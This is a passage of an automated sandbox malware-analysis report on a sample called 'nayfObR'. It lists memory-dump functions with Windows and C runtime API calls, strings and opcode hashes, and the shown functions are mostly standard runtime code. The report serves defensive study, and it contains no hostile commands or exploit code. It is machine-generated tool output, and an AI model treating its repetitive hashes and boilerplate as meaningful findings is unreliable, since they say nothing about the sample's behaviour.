                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: HeapProcess
                                                                                            • String ID:
                                                                                            • API String ID: 54951025-0
                                                                                            • Opcode ID: 9cd2adb8132c3e0b0a9f17472e6d567001bf0bb1ed74c7b4ff120f36395f38f0
                                                                                            • Instruction ID: 7b6405dd3077170831043378a9990dbb778b5502e3ffbda9fdbc3257b1ca9f4f
                                                                                            • Opcode Fuzzy Hash: 9cd2adb8132c3e0b0a9f17472e6d567001bf0bb1ed74c7b4ff120f36395f38f0
                                                                                            • Instruction Fuzzy Hash: 50A00270607641CF57908F755A09619369D65655D174540575405D5160D6344454AF11
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b2494390e9c9e37c2cafb6e98cebbe4d00908eadf6dfded3b6a887e212125cb6
                                                                                            • Instruction ID: 86878dd0ed6852fd8ee464463c84ec18fb70c0ae743651a1428f62a74692673e
                                                                                            • Opcode Fuzzy Hash: b2494390e9c9e37c2cafb6e98cebbe4d00908eadf6dfded3b6a887e212125cb6
                                                                                            • Instruction Fuzzy Hash: BCD0923A642A58AFC610CF89E440D41F7B8FB9E770B154167EA4893B20C331FC11CAE0
                                                                                            APIs
                                                                                            • GetCPInfo.KERNEL32(0343FDA8,0343FDA8,00000000,7FFFFFFF,?,005C3DBD,0343FDA8,0343FDA8,00000000,0343FDA8,?,?,?,?,0343FDA8,00000000), ref: 005C3E78
                                                                                            • __alloca_probe_16.LIBCMT ref: 005C3F33
                                                                                            • __alloca_probe_16.LIBCMT ref: 005C3FC2
                                                                                            • __freea.LIBCMT ref: 005C400D
                                                                                            • __freea.LIBCMT ref: 005C4013
                                                                                            • __freea.LIBCMT ref: 005C4049
                                                                                            • __freea.LIBCMT ref: 005C404F
                                                                                            • __freea.LIBCMT ref: 005C405F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: __freea$__alloca_probe_16$Info
                                                                                            • String ID:
                                                                                            • API String ID: 127012223-0
                                                                                            • Opcode ID: 814dfa175efc55140301023d1c1360b75c86bdb3c70b46ec0443191794676345
                                                                                            • Instruction ID: 5ae4cc0a59b6bbd2fe29bf6f2529453f27ff6d86574e071abfd2f126b5a6312b
                                                                                            • Opcode Fuzzy Hash: 814dfa175efc55140301023d1c1360b75c86bdb3c70b46ec0443191794676345
                                                                                            • Instruction Fuzzy Hash: E971E37294024A9FDF219FD48C5AFAE7FA9FF89310F14441DEA14BB282D7759D008BA0
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strrchr
                                                                                            • String ID:
                                                                                            • API String ID: 3213747228-0
                                                                                            • Opcode ID: 42ea02ea6af84237a2797da9c4c1132f2af8d53638729ead8d1b6fe62c757f4b
                                                                                            • Instruction ID: 32572e2e408379e99aa1f94b3d54e74a911d5f448b2661dd972cf2dd12521584
                                                                                            • Opcode Fuzzy Hash: 42ea02ea6af84237a2797da9c4c1132f2af8d53638729ead8d1b6fe62c757f4b
                                                                                            • Instruction Fuzzy Hash: F7B15772A0525A9FDB118F68CC86BFE7FA9FF99350F144155E804AF282D674F901CBA0
                                                                                            APIs
                                                                                            • type_info::operator==.LIBVCRUNTIME ref: 005B476B
                                                                                            • CallUnexpected.LIBVCRUNTIME ref: 005B49E4
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CallUnexpectedtype_info::operator==
                                                                                            • String ID: csm$csm$csm$xf\
                                                                                            • API String ID: 2673424686-3673733494
                                                                                            • Opcode ID: e3deb8c9678936d63823150d13d45668702ca8decb16ed92025f19fd696cf964
                                                                                            • Instruction ID: e1fd9df878f348930f25092a0c48b38c4aeadfc463ca54de358cef1296af5e37
                                                                                            • Opcode Fuzzy Hash: e3deb8c9678936d63823150d13d45668702ca8decb16ed92025f19fd696cf964
                                                                                            • Instruction Fuzzy Hash: 62B1547580021AAFCF28DFA4C8859EEBFB5FF45310F14856AE8156B212D731EA51CF91
                                                                                            APIs
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 005AA7B7
                                                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 005AA7BF
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 005AA848
                                                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 005AA873
                                                                                            • _ValidateLocalCookies.LIBCMT ref: 005AA8C8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                            • String ID: csm
                                                                                            • API String ID: 1170836740-1018135373
                                                                                            • Opcode ID: 853cea4275886a3bce44f2d4e9996e77415b6d33d33330b3a755385b5e7c139f
                                                                                            • Instruction ID: 79d62b735c8941b926d666d91c4eabe3702782c21876689295886e9fc8398e44
                                                                                            • Opcode Fuzzy Hash: 853cea4275886a3bce44f2d4e9996e77415b6d33d33330b3a755385b5e7c139f
                                                                                            • Instruction Fuzzy Hash: 7041C734E0021A9FCF10DF68D884AAE7FB5FF46314F148055E9159B356D735AA06CF92
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 2b058fe5eca1fbc4fc0023cbd903b6812c7843067580968b9e3728c416a69c38
                                                                                            • Instruction ID: 57f271c8bdb77d7581fd550a551aab1204b9c175f42b45becb6a900eb7e9074f
                                                                                            • Opcode Fuzzy Hash: 2b058fe5eca1fbc4fc0023cbd903b6812c7843067580968b9e3728c416a69c38
                                                                                            • Instruction Fuzzy Hash: 8BB1D170A0424AAFDB21DFE8C885FAE7FB5BFA5310F14415DE501AB292C770AD42CB61
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,005B3D6B,005AA54D,005A97A4), ref: 005B3D82
                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005B3D90
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005B3DA9
                                                                                            • SetLastError.KERNEL32(00000000,005B3D6B,005AA54D,005A97A4), ref: 005B3DFB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                            • String ID:
                                                                                            • API String ID: 3852720340-0
                                                                                            • Opcode ID: da93ab33afd6f6065cc064069bd4fc27857fd74ae0abc67431f93caf867d97f8
                                                                                            • Instruction ID: 5fb580e5ee689a5113d2b08409a927a3e123227ec031c78e7498c46c44772b44
                                                                                            • Opcode Fuzzy Hash: da93ab33afd6f6065cc064069bd4fc27857fd74ae0abc67431f93caf867d97f8
                                                                                            • Instruction Fuzzy Hash: D401DD322067135EE7241778ECCA5EB2F54FB523B4F20063BF410B60E2EE116D05E640
                                                                                            APIs
                                                                                            • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,9BCBA9B0,?,?,00000000,005C5334,000000FF,?,005AEE89,?,?,005AEF25,00000000), ref: 005AEDFD
                                                                                            • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 005AEE0F
                                                                                            • FreeLibrary.KERNEL32(00000000,?,?,00000000,005C5334,000000FF,?,005AEE89,?,?,005AEF25,00000000), ref: 005AEE31
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                            • API String ID: 4061214504-1276376045
                                                                                            • Opcode ID: 0ff908f237e84f6f75ce278d06f9e5880ec35980e4187449b13dde386b458da7
                                                                                            • Instruction ID: b61ebb1c9409fc7cbcc1294226f7d171eb821d6159d0bf5c1f0d4767e1cff2ae
                                                                                            • Opcode Fuzzy Hash: 0ff908f237e84f6f75ce278d06f9e5880ec35980e4187449b13dde386b458da7
                                                                                            • Instruction Fuzzy Hash: A001D632A51A59AFDB118F94DC0AFBFBFBCFB05B11F000529F811A22D0DB74A804CA80
                                                                                            APIs
                                                                                            • __EH_prolog3.LIBCMT ref: 005A7389
                                                                                            • std::_Lockit::_Lockit.LIBCPMT ref: 005A7394
                                                                                            • std::_Lockit::~_Lockit.LIBCPMT ref: 005A7402
                                                                                              • Part of subcall function 005A727F: std::locale::_Locimp::_Locimp.LIBCPMT ref: 005A7297
                                                                                            • std::locale::_Setgloballocale.LIBCPMT ref: 005A73AF
                                                                                            • _Yarn.LIBCPMT ref: 005A73C5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_SetgloballocaleYarn
                                                                                            • String ID:
                                                                                            • API String ID: 1088826258-0
                                                                                            • Opcode ID: 1ae9e2d881c2c71d952302a08626541b2469de7abe791097e998029e62844de9
                                                                                            • Instruction ID: 19909638df5bacdd87bfd92a1b904fb5cefa65cebdded93b9b2c8c89a8336d08
                                                                                            • Opcode Fuzzy Hash: 1ae9e2d881c2c71d952302a08626541b2469de7abe791097e998029e62844de9
                                                                                            • Instruction Fuzzy Hash: CD01B175A05A1A9FDB06EF60EC49A7D7FA1BFDA340B14001EE80257391CF386E46DB81
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,005BF2ED,00000000,?,005D1ED0,?,?,?,005BF224,00000004,InitializeCriticalSectionEx,005C90D4,005C90DC), ref: 005BF25E
                                                                                            • GetLastError.KERNEL32(?,005BF2ED,00000000,?,005D1ED0,?,?,?,005BF224,00000004,InitializeCriticalSectionEx,005C90D4,005C90DC,00000000,?,005B4C9C), ref: 005BF268
                                                                                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 005BF290
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: LibraryLoad$ErrorLast
                                                                                            • String ID: api-ms-
                                                                                            • API String ID: 3177248105-2084034818
                                                                                            • Opcode ID: 78bc0497cf623c2ef2916c8491c6299db257815e604c9ff56c1ee41d4f247a77
                                                                                            • Instruction ID: 4cb60ccfc0c4206c5d74b5e08031481fa8e3ce6896aba3cd2b2f6d181333a833
                                                                                            • Opcode Fuzzy Hash: 78bc0497cf623c2ef2916c8491c6299db257815e604c9ff56c1ee41d4f247a77
                                                                                            • Instruction Fuzzy Hash: 2CE04F34280304BBEB301F60EC0BFAC7F58BB60B91F544430FA0CA90E0E7B1B814AA85
                                                                                            APIs
                                                                                            • GetConsoleOutputCP.KERNEL32(9BCBA9B0,00000000,00000000,?), ref: 005BD0B1
                                                                                              • Part of subcall function 005B5101: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005B68D5,?,00000000,-00000008), ref: 005B5162
                                                                                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 005BD303
                                                                                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 005BD349
                                                                                            • GetLastError.KERNEL32 ref: 005BD3EC
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                                                                                            • String ID:
                                                                                            • API String ID: 2112829910-0
                                                                                            • Opcode ID: 965ac0a1d4d9b5de1a677704761af0a9927ddc988c42a68714ed6cdb6b2c34a4
                                                                                            • Instruction ID: 6f0a049e598934cdccdcfeec40daf523deebd09f0635a9f67d3bc7be0cd4912c
                                                                                            • Opcode Fuzzy Hash: 965ac0a1d4d9b5de1a677704761af0a9927ddc988c42a68714ed6cdb6b2c34a4
                                                                                            • Instruction Fuzzy Hash: 2DD16975E046499FCF15CFA8C884AEDBFF5FF48310F28452AE416EB252E630A941CB61
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: AdjustPointer
                                                                                            • String ID:
                                                                                            • API String ID: 1740715915-0
                                                                                            • Opcode ID: a6c7bc0d999896993073c33eb2cbf37700c5553b0d560c63890354b25c0e7ac2
                                                                                            • Instruction ID: ea44ee666e4dfcb81baf8173906719847365aa8fb5058da2c2bd3665801b4710
                                                                                            • Opcode Fuzzy Hash: a6c7bc0d999896993073c33eb2cbf37700c5553b0d560c63890354b25c0e7ac2
                                                                                            • Instruction Fuzzy Hash: A551B972A01606AFDF388F54D885BFA7BA5FF44310F144929E90587292E771FDA0DB90
                                                                                            APIs
                                                                                              • Part of subcall function 005B5101: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005B68D5,?,00000000,-00000008), ref: 005B5162
                                                                                            • GetLastError.KERNEL32(00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 005BAEDA
                                                                                            • __dosmaperr.LIBCMT ref: 005BAEE1
                                                                                            • GetLastError.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,00000000,00000000), ref: 005BAF1B
                                                                                            • __dosmaperr.LIBCMT ref: 005BAF22
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                            • String ID:
                                                                                            • API String ID: 1913693674-0
                                                                                            • Opcode ID: 1db3b4df4d2f835ef2055b514cfc6625e67a48401175a3cc92b90c376f3038d9
                                                                                            • Instruction ID: 191e3b95dd30d4b94449fed994ceeee5f57289c85f98449fce7690205eb8f1a7
                                                                                            • Opcode Fuzzy Hash: 1db3b4df4d2f835ef2055b514cfc6625e67a48401175a3cc92b90c376f3038d9
                                                                                            • Instruction Fuzzy Hash: 6221A4B1604606AF9F20AF65C8859FFBFADFF443647148919F81997150E731FC408BA2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_5a0000_nayfObR.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 3bcd68e95eb0f2bf8bda64b17ab4640afa58feddb2e8d9a02e3a34914f1170fa
                                                                                            • Instruction ID: 0116646335df5dc7446332c8dc8e8c1250dc3455765d9ae181471b5226d216ae
                                                                                            • Opcode Fuzzy Hash: 3bcd68e95eb0f2bf8bda64b17ab4640afa58feddb2e8d9a02e3a34914f1170fa
                                                                                            • Instruction Fuzzy Hash: D121AE71600206AF8B20EF69DC8596F7FA8FF863647145915F81ADB250E730EC00D7A1
                                                                                            APIs
                                                                                            • GetEnvironmentStringsW.KERNEL32 ref: 005BC276
                                                                                              • Part of subcall function 005B5101: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,005B68D5,?,00000000,-00000008), ref: 005B5162
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005BC2AE
                                                                                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 005BC2CE
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2030127177.00000000005A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 005A0000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2030112112.00000000005A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030357792.00000000005C6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030382067.00000000005D0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030402397.00000000005D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030444522.00000000005D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.2030464563.00000000005D7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
